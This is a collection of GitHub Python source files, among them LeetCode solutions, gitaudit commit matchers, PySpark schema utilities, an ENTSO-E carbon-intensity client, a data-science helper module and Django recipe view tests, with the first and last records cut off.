= self.my_cursor.fetchall()\n return self.myresult\n\nclass ProductManager(BaseManager):\n # management of \n\n def __init__(self, db):\n super().__init__(db)\n pass\n\n\n def create_from_api(self):\n pass\n\n def create_from_database(self):\n pass\n\n def get_product_by_id(self, id_product):\n pass\n\n def get_all(self):\n pass\n\n def get_all_by_category(self, category):\n pass\n\n def get_all_by_nutriscore(self, nutriscore):\n pass\n\n def get_substitutes(self, product_origin):\n pass\n\n\nclass FavoriteManager(BaseManager):\n\n def __init__(self, db):\n super().__init__(db)\n\n def get_all(self):\n pass\n\n def save_substitute(self, product_origin, product_substitute):\n pass\n\"\"\"","repo_name":"SonyTison/PureBeurreApp","sub_path":"database_xchange/managers.py","file_name":"managers.py","file_ext":"py","file_size_in_byte":5523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"16315915707","text":"# https://leetcode.com/problems/largest-3-same-digit-number-in-string/\n\nclass Solution:\n def largestGoodInteger(self, num: str) -> str:\n result = ''\n segment = ''\n for digit in num:\n if not segment or segment[-1] == digit:\n segment += digit\n else:\n if len(segment) >= 3:\n segment = segment[:3]\n if not result or int(segment) > int(result):\n result = segment\n segment = digit\n if len(segment) >= 3:\n segment = segment[:3]\n if not result or int(segment) > int(result):\n result = segment\n return result\n","repo_name":"sometastycake/leetcode","sub_path":"strings/easy/largest-3-same-digit-number-in-string.py","file_name":"largest-3-same-digit-number-in-string.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"29618522363","text":"def uses_only(word,available):\n for letter in word:\n if letter not in available:\n return False\n return True\n\nfin = open('words.txt')\nfor letter in fin:\n word = letter.strip()\n if uses_only(word,'acefhlo'):\n print(word)","repo_name":"CivilizedWork/Whisper-Jhin","sub_path":"day9/Exercise9.4.py","file_name":"Exercise9.4.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"4435662428","text":"\"\"\"Matchers for merge diff analysis\n\"\"\"\n\nfrom typing import List\nfrom hashlib import sha1\n\nfrom pydantic import BaseModel\n\nfrom gitaudit.git.change_log_entry import ChangeLogEntry\nfrom gitaudit.branch.hierarchy import sha_to_entry_map\n\n\nclass MatchResult(BaseModel):\n \"\"\"Match Result consisting of head, base, and confidence entries\"\"\"\n\n head: ChangeLogEntry\n base: ChangeLogEntry\n\n\nclass Matcher:\n \"\"\"Generic class for matching commits\"\"\"\n\n def match(self, head: List[ChangeLogEntry], base: List[ChangeLogEntry]) -> List[MatchResult]:\n \"\"\"Match the hierlog entries\n\n Args:\n head (List[ChangeLogEntry]): Head Hier List\n base (List[ChangeLogEntry]): Base Hier List\n\n Raises:\n NotImplementedError: Abstract Placeholder\n\n Returns:\n List[MatchResult]: List of commit Matches\n \"\"\"\n raise NotImplementedError\n\n\nclass SameCommitMatcher(Matcher):\n \"\"\"Accounts for branching strategies where dev and master branches are regularly cross merged.\n\n In very rare occasions it can happen that a feature branch was created before branch off\n and then can be merged into both branches that are to be matched with different merge commits.\n\n All matches will have an ABSOLUTE confidence level.\n \"\"\"\n\n def match(self, head: List[ChangeLogEntry], base: List[ChangeLogEntry]) -> List[MatchResult]:\n \"\"\"Match the hierlog entries\n\n Args:\n head (List[ChangeLogEntry]): Head Bucket List\n base (List[ChangeLogEntry]): Base Bucket List\n\n Returns:\n List[MatchResult]: List of commit Matches\n \"\"\"\n entry_head_map = sha_to_entry_map(head)\n entry_base_map = sha_to_entry_map(base)\n\n matches = []\n\n for sha, head_entry in entry_head_map.items():\n if sha in entry_base_map:\n matches.append(\n MatchResult(\n head=head_entry,\n base=entry_base_map[sha],\n )\n )\n\n return matches\n\n\nclass DirectCherryPickMatcher(Matcher):\n \"\"\"If a cherry pick was done with the -x option the commit message will have a\n (cherry picked from commit ) message in the commit body. This sha can be used for matching.\n\n The cherry pick matcher will match in both directions (head <-> base) as it can happen that in a\n project the bugfix has to be done quickly in release and is then cherry picked to main later.\n\n All matches will have an ABSOLUTE confidence level.\n \"\"\"\n\n def __init__(self, head_to_base: bool = True, base_to_head: bool = True) -> None:\n \"\"\"Constructor\n\n Args:\n head_to_base (bool): Head commit was cherry picked with -x from base\n base_to_head (bool): Base commit was cherry picked with -x from head\n \"\"\"\n super().__init__()\n\n self.head_to_base = head_to_base\n self.base_to_head = base_to_head\n\n def match(self, head: List[ChangeLogEntry], base: List[ChangeLogEntry]) -> List[MatchResult]:\n \"\"\"Match the hierlog entries\n\n Args:\n head (List[ChangeLogEntry]): Head Bucket List\n base (List[ChangeLogEntry]): Base Bucket List\n\n Raises:\n NotImplementedError: Abstract Placeholder\n\n Returns:\n List[MatchResult]: List of commit Matches\n \"\"\"\n\n entry_head_map = sha_to_entry_map(head)\n entry_base_map = sha_to_entry_map(base)\n\n matches = []\n\n if self.head_to_base:\n for head_entry in entry_head_map.values():\n if not head_entry.cherry_pick_sha:\n continue\n\n if head_entry.cherry_pick_sha in entry_base_map:\n matches.append(\n MatchResult(\n head=head_entry,\n base=entry_base_map[head_entry.cherry_pick_sha],\n )\n )\n\n if self.base_to_head:\n for base_entry in entry_base_map.values():\n if not base_entry.cherry_pick_sha:\n continue\n\n if base_entry.cherry_pick_sha in entry_head_map:\n matches.append(\n MatchResult(\n head=entry_head_map[base_entry.cherry_pick_sha],\n base=base_entry,\n )\n )\n\n return matches\n\n\nclass ThirdPartyCherryPickMatcher(Matcher):\n \"\"\"It can happen that a bug fix was created on master and then is cherry picked with -x option\n to release and hotfix branch. If a matching between release and hotfix is made the sha in the\n commit messase (cherry picked from commit ) will point to a third party commit unrelated\n to the branches under comparison.\n\n All matches will have an ABSOLUTE confidence level.\n \"\"\"\n\n def match(self, head: List[ChangeLogEntry], base: List[ChangeLogEntry]) -> List[MatchResult]:\n \"\"\"Match the hierlog entries\n\n Args:\n head (List[ChangeLogEntry]): Head Bucket List\n base (List[ChangeLogEntry]): Base Bucket List\n\n Raises:\n NotImplementedError: Abstract Placeholder\n\n Returns:\n List[MatchResult]: List of commit Matches\n \"\"\"\n\n entry_head_map = sha_to_entry_map(head)\n entry_base_map = sha_to_entry_map(base)\n\n matches = []\n\n cherry_picked_from_head_map = {\n x.cherry_pick_sha: x\n for x in filter(\n lambda entry: entry.cherry_pick_sha,\n entry_head_map.values(),\n )\n }\n cherry_picked_from_base_map = {\n x.cherry_pick_sha: x\n for x in filter(\n lambda entry: entry.cherry_pick_sha,\n entry_base_map.values(),\n )\n }\n\n for cp_sha, head_entry in cherry_picked_from_head_map.items():\n if cp_sha not in cherry_picked_from_base_map:\n continue\n\n matches.append(\n MatchResult(\n head=head_entry,\n base=cherry_picked_from_base_map[cp_sha],\n )\n )\n\n return matches\n\n\ndef numstat_to_sha1(entry: ChangeLogEntry, with_additions_deletions=True):\n \"\"\"Calculates a sha1 hash out of the numstat file changes\n\n Args:\n entry (ChangeLogEntry): Change Log Entry\n with_additions_deletions (bool, optional): Whether additions and deletions shall be\n accounted for. Defaults to True.\n\n Returns:\n str: sha1 hash\n \"\"\"\n if with_additions_deletions:\n file_add_del_texts = map(\n lambda x: f\"{x.path}({x.additions}|{x.deletions})\",\n entry.sorted_numstat,\n )\n else:\n file_add_del_texts = map(\n lambda x: x.path,\n entry.sorted_numstat,\n )\n return sha1(\"\".join(file_add_del_texts).encode(\"utf-8\")).hexdigest()\n\n\ndef create_numstat_map(\n entries: List[ChangeLogEntry],\n with_additions_deletions: bool,\n ignore_merge_commits: bool,\n):\n \"\"\"Creates a numstat sha1 to change log entry map that can be used for commit matching\n\n Args:\n entries (List[ChangeLogEntry]): List of change log entries\n with_additions_deletions (bool): Whether additions / deletions shall be accounted\n for in the map generation.\n ignore_merge_commits (bool): Ignore merge commits removes duplicate entries if a merge\n commit came from one single commit on a branch.\n\n Returns:\n Dict[str, ChangeLogEntry]: Numstat sha1 to ChangeLogEntry map\n \"\"\"\n numstat_map = {}\n ignore_entries = []\n\n for entry in entries:\n if not entry.numstat:\n continue\n\n if ignore_merge_commits and len(entry.parent_shas) > 1:\n continue\n\n stat_sha1 = numstat_to_sha1(entry, with_additions_deletions)\n\n if stat_sha1 in ignore_entries:\n continue\n\n if stat_sha1 in numstat_map:\n numstat_map.pop(stat_sha1)\n ignore_entries.append(stat_sha1)\n continue\n\n numstat_map[stat_sha1] = entry\n\n return numstat_map\n\n\nclass FilesChangedMatcher(Matcher):\n \"\"\"In case a cherry pick was NOT done with the -x option enabled an exact matching is not\n possible. But if a cherry pick was done successfully, the files changed in both commits shall\n be the exact same. Therefore, the changes files withing a commit can be used to determine\n if two commits are equal.\n\n All matches will have a STRONG confidence level. If there are multiple matches the additions and\n deletions will be used to filter false positives (note that additions and deletions check is\n done for all matches automatically to proove confidence). In case the additions and deletions\n are not matched the confidence level is dropped to LOW.\n \"\"\"\n\n def __init__(\n self,\n with_additions_deletions: bool = True,\n ignore_merge_commits: bool = True,\n ) -> None:\n super().__init__()\n self.with_additions_deletions = with_additions_deletions\n self.ignore_merge_commits = ignore_merge_commits\n\n def match(self, head: List[ChangeLogEntry], base: List[ChangeLogEntry]) -> List[MatchResult]:\n \"\"\"Match the hierlog entries\n\n Args:\n head (List[ChangeLogEntry]): Head Bucket List\n base (List[ChangeLogEntry]): Base Bucket List\n\n Raises:\n NotImplementedError: Abstract Placeholder\n\n Returns:\n List[MatchResult]: List of commit Matches\n \"\"\"\n\n entry_head_map = sha_to_entry_map(head)\n entry_base_map = sha_to_entry_map(base)\n\n numstat_head_map = create_numstat_map(\n list(entry_head_map.values()),\n self.with_additions_deletions,\n self.ignore_merge_commits,\n )\n numstat_base_map = create_numstat_map(\n list(entry_base_map.values()),\n self.with_additions_deletions,\n self.ignore_merge_commits,\n )\n\n matches = []\n\n for cp_sha, head_entry in numstat_head_map.items():\n if cp_sha not in numstat_base_map:\n continue\n\n matches.append(\n MatchResult(\n head=head_entry,\n base=numstat_base_map[cp_sha],\n )\n )\n\n return matches\n\n\nclass WhitelistMatcher(Matcher):\n \"\"\"A whitelist can be provided from an outside data source to match head and base commits.\n\n All matches will have an ABSOLUTE confidene level.\n \"\"\"\n\n def match(self, head: List[ChangeLogEntry], base: List[ChangeLogEntry]) -> List[MatchResult]:\n \"\"\"Match the hierlog entries\n\n Args:\n head (List[ChangeLogEntry]): Head Bucket List\n base (List[ChangeLogEntry]): Base Bucket List\n\n Raises:\n NotImplementedError: Abstract Placeholder\n\n Returns:\n List[MatchResult]: List of commit Matches\n \"\"\"\n\n\nclass JiraIssueKeyMatcher(Matcher):\n \"\"\"Based on the regular expression r'[\\\\w\\\\d]+-\\\\d+' which matches jira issue keys possible\n matches are determined. A custom regular expression can also be provided.\n A commit may contain multiple issue keys, also multiple matches are possible.\n\n All matches will have a GOOD confidence level. In case the additions and deletions\n are not matched the confidence level is dropped to LOW.\n \"\"\"\n\n def match(self, head: List[ChangeLogEntry], base: List[ChangeLogEntry]) -> List[MatchResult]:\n \"\"\"Match the hierlog entries\n\n Args:\n head (List[ChangeLogEntry]): Head Bucket List\n base (List[ChangeLogEntry]): Base Bucket List\n\n Raises:\n NotImplementedError: Abstract Placeholder\n\n Returns:\n List[MatchResult]: List of commit Matches\n \"\"\"\n\n\nclass SubjectMatcher(Matcher):\n \"\"\"Based on the subject it is checked whether head subject is contained in base or vice versa.\n\n All matches will have a GOOD confidence level. In case the additions and deletions\n are not matched the confidence level is dropped to LOW.\n \"\"\"\n\n def match(self, head: List[ChangeLogEntry], base: List[ChangeLogEntry]) -> List[MatchResult]:\n \"\"\"Match the hierlog entries\n\n Args:\n head (List[ChangeLogEntry]): Head Bucket List\n base (List[ChangeLogEntry]): Base Bucket List\n\n Raises:\n NotImplementedError: Abstract Placeholder\n\n Returns:\n List[MatchResult]: List of commit Matches\n \"\"\"\n","repo_name":"MatthiasRieck/gitaudit","sub_path":"gitaudit/analysis/merge_diff/matchers.py","file_name":"matchers.py","file_ext":"py","file_size_in_byte":12706,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"37773594","text":"\n\nclass Note:\n\n def __init__(self, note_on, note_off):\n self.value = note_on.note\n self.velocity = note_on.velocity\n self.start_time = note_on.delta\n self.end_time = note_off.delta\n self.duration = self.end_time[0] - self.start_time[0]\n\n\n @staticmethod\n def pair_notes(note_ons, note_offs):\n notes = []\n\n # handle all notes off\n for note_on in note_ons:\n for note_off in note_offs:\n\n if note_off.note == note_on.note:\n notes.append(Note(note_on, note_off))\n return notes\n\n","repo_name":"k4pran/imidi","sub_path":"note.py","file_name":"note.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"23407468711","text":"import logging\nfrom typing import List, Set, Union\n\nfrom pyspark.sql.types import StructType, ArrayType, AtomicType\n\nfrom nestedfunctions.spark_schema.schema_flattener import flatten_schema\n\nlog = logging.getLogger(__name__)\n\n\nclass SparkSchemaUtility:\n\n @staticmethod\n def flatten_schema_include_parents_fields(schema: StructType) -> Set[str]:\n \"\"\"\n returns flattened representation of schema including parent fields names\n \"\"\"\n return set(flatten_schema(schema=schema, include_parent_as_field=True))\n\n @staticmethod\n def flatten_schema(schema: StructType) -> List[str]:\n \"\"\"\n returns flattened representation of schema including only fields which contain values\n (parent fields that holding structure are not presented in the result)\n \"\"\"\n return flatten_schema(schema)\n\n @staticmethod\n def is_column_exist(schema: StructType, column: str) -> bool:\n columns_ordered = column.split('.')\n col = columns_ordered.pop(0)\n if not isinstance(schema, StructType):\n return False\n if col not in schema.names:\n return False\n if len(columns_ordered) == 0:\n return col in schema.names\n\n else:\n return SparkSchemaUtility.is_column_exist(SparkSchemaUtility.__get_schema_for_field(schema, col),\n '.'.join(columns_ordered))\n\n @staticmethod\n def parent_element(column: str):\n separator = '.'\n if '.' not in column:\n raise Exception(f\"No parent element in {column}\")\n *parents, last = column.split(separator)\n return separator.join(parents)\n\n @staticmethod\n def __get_schema_for_field(schema: StructType, col: str):\n f = schema[col]\n dt = type(f.dataType)\n\n if dt is ArrayType:\n return f.dataType.elementType\n else:\n return f.dataType\n\n @staticmethod\n def is_array(schema: StructType, field: str) -> bool:\n log.debug(f\"Checking is array for field: {field}\")\n split = field.split(\".\")\n t = schema\n for sub_type in split:\n data_type = t[sub_type].dataType\n if type(data_type) == ArrayType:\n t = data_type.elementType\n else:\n t = data_type\n return type(data_type) == ArrayType\n\n @staticmethod\n def schema_for_field(schema: StructType, field: str) -> Union[StructType, AtomicType]:\n if not SparkSchemaUtility.is_column_exist(schema, field):\n raise Exception(f\"Column `{field}` does not exist\")\n return SparkSchemaUtility.__schema_for_field_rec(schema, field)\n\n @staticmethod\n def __schema_for_field_rec(schema: StructType, field: str) -> StructType:\n if field == \"\":\n return schema\n else:\n columns_ordered = field.split('.')\n col = columns_ordered.pop(0)\n return SparkSchemaUtility.__schema_for_field_rec(SparkSchemaUtility.__get_schema_for_field(schema, col),\n '.'.join(columns_ordered))\n","repo_name":"golosegor/pyspark-nested-fields-functions","sub_path":"nestedfunctions/spark_schema/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":3148,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"27"} +{"seq_id":"29137884161","text":"print(\"Welcome to Isha's general knowledge quiz!\")\n\nplaying = input(\"Should we begin playing? \")\n\nif playing.lower() != \"yes\":\n quit()\n\nprint(\"Let's play then!!\")\nscore = 0\n\nanswer = input(\"Who is the president of the United States? \")\nif answer.lower() == \"joe biden\":\n print('Correct!')\n score += 1\nelse:\n print(\"Incorrect!\")\n\nanswer = input(\"Biggest state in the US? \")\nif answer.lower() == \"alaska\":\n print('Correct!')\n score += 1\nelse:\n print(\"Incorrect!\")\n\nanswer = input(\"Capital of Texas? \")\nif answer.lower() == \"austin\":\n print('Correct!')\n score += 1\nelse:\n print(\"Incorrect!\")\n\n\n\nprint(\"You got \" + str(score) + \" questions correct!\")\nprint(\"You got \" + str((score / 3) * 100) + \"%. answers right!\")","repo_name":"ishakoregave/Quiz-Game","sub_path":"ishasquiz.py","file_name":"ishasquiz.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"41483929762","text":"import requests\nimport json\nfrom datetime import datetime\nimport xml.etree.ElementTree as ET\nfrom datetime import timedelta\nfrom io import StringIO \nimport pprint\nimport sys\n\npp = pprint.PrettyPrinter(indent=4)\n\nENTSOE_GENERATION_TYPE_CODES ={\n 'B01': 'Biomass',\n 'B02': 'Fossil Brown coal/Lignite',\n 'B03': 'Fossil Coal-derived gas', # Not applicable for Germany\n 'B04': 'Fossil Gas',\n 'B05': 'Fossil Hard coal',\n 'B06': 'Fossil Oil',\n 'B07': 'Fossil Oil shale', # Not applicable for Germany\n 'B08': 'Fossil Peat', # Not applicable for Germany\n 'B09': 'Geothermal',\n 'B10': 'Hydro Pumped Storage',\n 'B11': 'Hydro Run-of-river and poundage',\n 'B12': 'Hydro Water Reservoir',\n 'B13': 'Marine', # Not applicable for Germany\n 'B14': 'Nuclear',\n 'B15': 'Other renewable',\n 'B16': 'Solar',\n 'B17': 'Waste',\n 'B18': 'Wind Offshore',\n 'B19': 'Wind Onshore',\n 'B20': 'Other',\n}\n\nENTSOE_GENERATION_TYPE_GROUPS = {\n 'biomass': ['B01', 'B17'],\n 'coal': ['B02', 'B05', 'B07', 'B08'],\n 'gas': ['B03', 'B04'],\n 'geothermal': ['B09'],\n 'hydro': ['B11', 'B12'],\n 'nuclear': ['B14'],\n 'oil': ['B06'],\n 'solar': ['B16'],\n 'wind': ['B18', 'B19'],\n 'unknown': ['B20', 'B13', 'B15'],\n 'hydro storage': ['B10']\n}\n\n# Source: IPCC 2014 Standards and Electricity Map\n# CIPK - Carbon Intensity Per Kilowatt Hour\nCIPK_VALUES_GENERATION_TYPE_GROUPS = {\n 'biomass': 230,\n 'coal': 820,\n 'gas': 490,\n 'geothermal': 38,\n 'hydro': 24,\n 'nuclear': 12,\n 'oil': 650,\n 'solar': 45,\n 'wind': 11,\n 'unknown': 700,\n 'hydro storage': 345\n}\n\nCIPK_VALUES_FOR_PSR_TYPES = {\n 'B01': 230,\n 'B02': 820,\n 'B03': 490, # Not applicable for Germany\n 'B04': 490,\n 'B05': 820,\n 'B06': 650,\n 'B07': 820, # Not applicable for Germany\n 'B08': 820, # Not applicable for Germany\n 'B09': 38,\n 'B10': 345,\n 'B11': 24,\n 'B12': 24,\n 'B13': 700, # Not applicable for Germany\n 'B14': 12,\n 'B15': 700,\n 'B16': 45,\n 'B17': 230,\n 'B18': 11,\n 'B19': 11,\n 'B20': 700,\n}\n\n\n\nclass CarbonIntensityAPI:\n def __init__(self, in_Domain = '10Y1001A1001A83F', startPeriod = None, endPeriod = None ):\n # Constants\n self.API_KEY = \"42ee4b45-f276-4ef7-88ba-89e4964e54dd\"\n self.API = \"https://transparency.entsoe.eu/api?\"\n\n self.documentType = 'A75' # Actual generation data per type\n self.in_Domain = in_Domain # Domain code for Germany\n self.processType = 'A16' # Realised - Actual Value\n self.genDataDict = {} # Dictionary which holds generation data for every generation group\n self.timestamps = []\n self.CIPKvalues = {}\n self.startPeriod = startPeriod\n self.endPeriod = endPeriod\n\n self.generateTimestamps(startPeriod, endPeriod)\n\n # Generates timestamps between 'startPeriod' and 'endPeriod'\n def generateTimestamps(self, startPeriod = None, endPeriod = None):\n if startPeriod == None or endPeriod == None:\n self.startPeriod = datetime.strftime(datetime.now().replace(hour=0, minute=0, second=0, microsecond=0) - timedelta(days=1), \"%Y%m%d%H%M\")\n self.endPeriod = datetime.strftime(datetime.now().replace(hour=0, minute=0, second=0, microsecond=0), \"%Y%m%d%H%M\")\n for i in range(0,24):\n # Previous day value is used as proxy for today's value. Add timedelta of 1 day\n timestampGeneration = datetime.strptime(self.startPeriod,\"%Y%m%d%H%M\") + timedelta( hours=(i),days=1 ) \n self.timestamps.append(timestampGeneration)\n elif startPeriod > endPeriod:\n print (\"Invalid Input. Start Period can not be higher that end period\")\n sys.exit(1)\n elif (startPeriod.day > datetime.now().day):\n print (\"Check the Start Period. Please use the script to get past co2 emission data or today's co2 emission forecast\")\n sys.exit(1)\n elif (endPeriod > (datetime.now().replace(hour=0, minute=0) + timedelta(days=1))):\n print (\"Please check the End Period. It can't be greater than today\")\n sys.exit(1)\n else:\n timestamp = self.startPeriod\n while(timestamp < self.endPeriod):\n self.timestamps.append(datetime.strftime(timestamp, \"%Y%m%d%H%M\"))\n timestamp = timestamp + timedelta( hours=1 )\n pp.pprint(str(timestamp) + \" \" + str(self.endPeriod))\n self.startPeriod = datetime.strftime(self.startPeriod, \"%Y%m%d%H%M\")\n self.endPeriod = datetime.strftime(self.endPeriod, \"%Y%m%d%H%M\")\n\n\n def getGenerationPerUnit(self, psrType):\n \"\"\"Query and collect the power generation data of the previous day for\n a generation unit namely coal or gas.\n\n @return:\n \"\"\"\n params = {\n 'securityToken': self.API_KEY,\n 'documentType': self.documentType,\n 'processType': self.processType,\n 'psrType': psrType,\n 'in_Domain': self.in_Domain,\n 'periodStart': self.startPeriod,\n 'periodEnd': self.endPeriod\n }\n\n try:\n queryResponse = requests.get(self.API, params)\n if queryResponse.status_code != 200: \n print(\"co2 api::Not Successful! Status code: \", queryResponse.status_code)\n # This error is raised, as certain psType is not applicable for Germany\n return\n \n # Received string is in HTML format \n apiResponse = ET.iterparse(StringIO(queryResponse.text))\n for _, elementTag in apiResponse:\n prefix, has_namespace, postfix = elementTag.tag.partition('}')\n if has_namespace:\n elementTag.tag = postfix # strip all namespaces\n root = apiResponse.root\n \n generationData = {}\n for timeSeriesTag in root.iter('TimeSeries'):\n for periodTag in timeSeriesTag.iter('Period'):\n for index, point in enumerate(periodTag):\n if (index > 1):\n positionOfPoint = int(point[0].text) - 1\n priceOfPoint = int(point[1].text)\n timestampGeneration = datetime.strptime(self.startPeriod,\"%Y%m%d%H%M\") + timedelta(minutes=(positionOfPoint * 15),days=1)\n generationData[str(timestampGeneration)] = priceOfPoint\n return generationData\n \n except requests.RequestException as e:\n print(\"request exception\")\n print(e)\n\n # Example: Group 'biomass' includes B01(biomass) and B17(waste)\n # Calculate Power Generation of every generation group for the previous day\n def getPowerGenData(self):\n for psrType in ENTSOE_GENERATION_TYPE_CODES:\n self.genDataDict[psrType] = self.getGenerationPerUnit(psrType)\n\n # CIPK Unit : gCO2eq/kWh\n def calculateCarbonIntensity(self):\n for timestamp in self.timestamps:\n totalPowerProduced = 0\n totalCarbonProduced = 0\n i = 0\n while(i < 4):\n for psrType in self.genDataDict:\n if self.genDataDict[psrType] != None:\n # Data has to be converted from MW to kWh\n # Factor 0.25 : To convert from MW to MWh\n # Factor 1000 : To convert from MWh to kWh\n powerPerPsrType = self.genDataDict[psrType][str(timestamp)] * 1000 * 0.25 # Unit : kWh\n totalPowerProduced = totalPowerProduced + ( powerPerPsrType )\n totalCarbonProduced = totalCarbonProduced + ( powerPerPsrType * CIPK_VALUES_FOR_PSR_TYPES[psrType])\n timestamp = timestamp + timedelta(minutes=15)\n i = i + 1\n CIPK = totalCarbonProduced / totalPowerProduced\n timestamp = timestamp - timedelta(hours=1)\n print(timestamp, totalPowerProduced , totalCarbonProduced )\n self.CIPKvalues[timestamp] = CIPK\n return self.CIPKvalues\n \n\n# datetime(year, month, day, hour, minute)\n# Example: datetime(2017, 11, 28, 23, 55)\nif __name__ == \"__main__\": \n carbonIntensity = CarbonIntensityAPI()\n carbonIntensity.getPowerGenData()\n pp.pprint(carbonIntensity.calculateCarbonIntensity())\n","repo_name":"DinoSubbu/SmartEnergyManagementSystem","sub_path":"backend/co2/co2_api.py","file_name":"co2_api.py","file_ext":"py","file_size_in_byte":8451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"10963604022","text":"import os\nimport urllib\nfrom IPython.display import display\nimport pyarrow as pa\nimport pyarrow.parquet as pq\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom pandas_profiling import ProfileReport\nfrom pandas.plotting import scatter_matrix\nfrom sklearn.model_selection import train_test_split\nimport phik\nfrom scipy import stats\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler, RobustScaler\n\nclass dataLoader:\n def __init__(self):\n self._ROOT_DIRECTORY = \"./data/\"\n self._TRAIN_LOCAL_PATH = \"./data/train.csv\"\n self._TEST_LOCAL_PATH = \"./data/test.csv\"\n self._SUBMISSION_LOCAL_PATH = \"./results/submission.csv\"\n\n def batch_loader(self, path, is_csv, file_sep = \",\"):\n '''\n Loads the dataset at the given path, in various formats\n '''\n if not is_csv:\n return pd.read_parquet(path)\n else:\n return pd.read_csv(path, sep = file_sep) \n \n def cloud_loader(self, url, name, is_csv, file_sep = \",\"):\n '''\n Fetches a file from an URL and loads it in various formats\n '''\n file = urllib.request.urlretrieve(url, self._ROOT_DIRECTORY + name)\n if not is_csv:\n return pd.read_parquet(file)\n else:\n return pd.read_csv(file, sep = file_sep) \n \nclass dataSplitter:\n def __init__(self, df):\n self._df = df\n\n def train_splitter(self, target=\"\", size=0.2, seed=42, is_Stratified= False):\n '''\n Splits your dataset randomly or stratified according to a target feature\n '''\n if is_Stratified:\n return train_test_split(self._df, self._df[target], test_size = size, random_state = seed, stratify = self._df[target])\n else:\n return train_test_split(self._df, test_size = size, random_state = seed)\n \n \n\nclass dataExplorer:\n def __init__(self, df, categorical, numerical):\n self._SMALL_SIZE = 24\n self._MEDIUM_SIZE = 32\n self._BIGGER_SIZE = 48\n self._df = df\n self._categorical = categorical\n self._numerical = numerical\n\n def basic_explorer(self, target):\n '''\n Returns an overview, basic information and statistics of your dataset\n '''\n display(self._df.head(5))\n display(self._df.info()) \n display(self._df.describe()) \n display(self._df[target].value_counts())\n \n def profile_explorer(self):\n '''\n Returns the pandas-profiling ProfileReport\n '''\n profile = ProfileReport(self._df)\n display(profile)\n \n def outlier_explorer(self, features=[]):\n '''\n Plots a Boxplot to analyze prossible Outliers \n '''\n plt.rc('font', size = self._SMALL_SIZE) \n plt.rc('axes', titlesize = self._SMALL_SIZE) \n plt.rc('axes', labelsize = self._MEDIUM_SIZE) \n plt.rc('xtick', labelsize = self._SMALL_SIZE) \n plt.rc('ytick', labelsize = self._SMALL_SIZE) \n plt.rc('legend', fontsize = self._SMALL_SIZE) \n plt.rc('figure', titlesize = self._BIGGER_SIZE) \n fig = plt.figure(figsize =(self._SMALL_SIZE, self._SMALL_SIZE))\n ax = fig.add_subplot()\n ax.boxplot([self._df[features]], labels =[features])\n ax.set_title('Outliers')\n ax.set_xlabel('Feature')\n ax.set_ylabel('Value')\n display(plt.show());\n\n \n def scatter_explorer(self, numerical, size):\n '''\n Plots an scatter matrix of the numerical fetures of a given dataset\n '''\n display(scatter_matrix(self._df[numerical], figsize = (size, size)));\n\n\n def correlation_explorer(self, target, numerical, is_phik, size):\n '''\n Returns a Pearsons R correlation matrix or an Phik matrix for both categorical and numerical features\n '''\n if not is_phik:\n corr_matrix = self._df.corr(numerical)\n else:\n corr_matrix = self._df.phik_matrix()\n fig, ax = plt.subplots(figsize=(size, size)) \n display(sns.heatmap(corr_matrix, annot=True, linewidths=.5, ax=ax))\n print(corr_matrix[target].sort_values(ascending = False))\n\n\n\nclass dataProcessor:\n def __init__(self, df, categorical, numerical) :\n self._df = df\n self._categorical = categorical\n self._numerical = numerical\n\n \n def imputer_processor(self, is_drop, is_mean = False, is_median = False, is_constant = False, constant = 0):\n '''\n Returns an imputed missing values dataset\n '''\n missing = self._df.isnull().value_counts()\n print(missing)\n if is_drop:\n return self._df[missing].dropna()\n elif is_mean:\n return self._df[missing].fillna((self._df[missing].mean()), inplace = True)\n elif is_median:\n return self._df[missing].fillna((self._df[missing].median()), inplace = True)\n elif is_constant:\n return self._df[missing].fillna(constant, inplace = True)\n else:\n return self._df.drop([missing], axis = 1)\n\n \n def outlier_processor(self, std_threshold = 3):\n '''\n Drops the outliers of a dataset\n '''\n return self._df[(np.abs(stats.zscore(self._df)) < std_threshold).all(axis = 1)]\n\n\n def encoder_processor(self, is_OHE = True):\n '''\n Applies OneHotEncoding to a given dataset\n '''\n if is_OHE:\n return pd.get_dummies(self._df[self._categorical])\n else:\n return self._df\n\n def scaler_processor(self, is_Standard = True, is_MinMax = False, is_Robust = False):\n ''' \n Scales the dataset with Standard/MinMax/RobustScaler\n '''\n if is_Standard:\n scaler = StandardScaler()\n elif is_MinMax:\n scaler = MinMaxScaler()\n elif is_Robust:\n scaler = RobustScaler()\n else:\n scaler = StandardScaler()\n self._df[self._numerical] = scaler.fit_transform(self._df[self._numerical])\n return self._df\n\n\n\n","repo_name":"JMeneu/mlTools","sub_path":"mlTools.py","file_name":"mlTools.py","file_ext":"py","file_size_in_byte":6121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"21922752713","text":"from django.test import TestCase\nfrom django.urls import resolve, reverse\n\nfrom recipes import views\nfrom recipes.models import Category, Recipe, User\n\n\nclass RecipeViewsTest(TestCase):\n def test_recipe_home_view_function_is_correct(self):\n view = resolve(reverse('recipes:home'))\n self.assertIs(view.func, views.home)\n\n def test_recipe_category_view_function_is_correct(self):\n view = resolve(reverse('recipes:category', kwargs={'category_id': 1}))\n self.assertIs(view.func, views.category)\n\n def test_recipe_category_view_returns__404_if_no_recipes_found(self):\n response = self.client.get(\n reverse('recipes:category', kwargs={'category_id': 10000}))\n self.assertEqual(response.status_code, 404)\n\n def test_recipe_detail_view_function_is_correct(self):\n 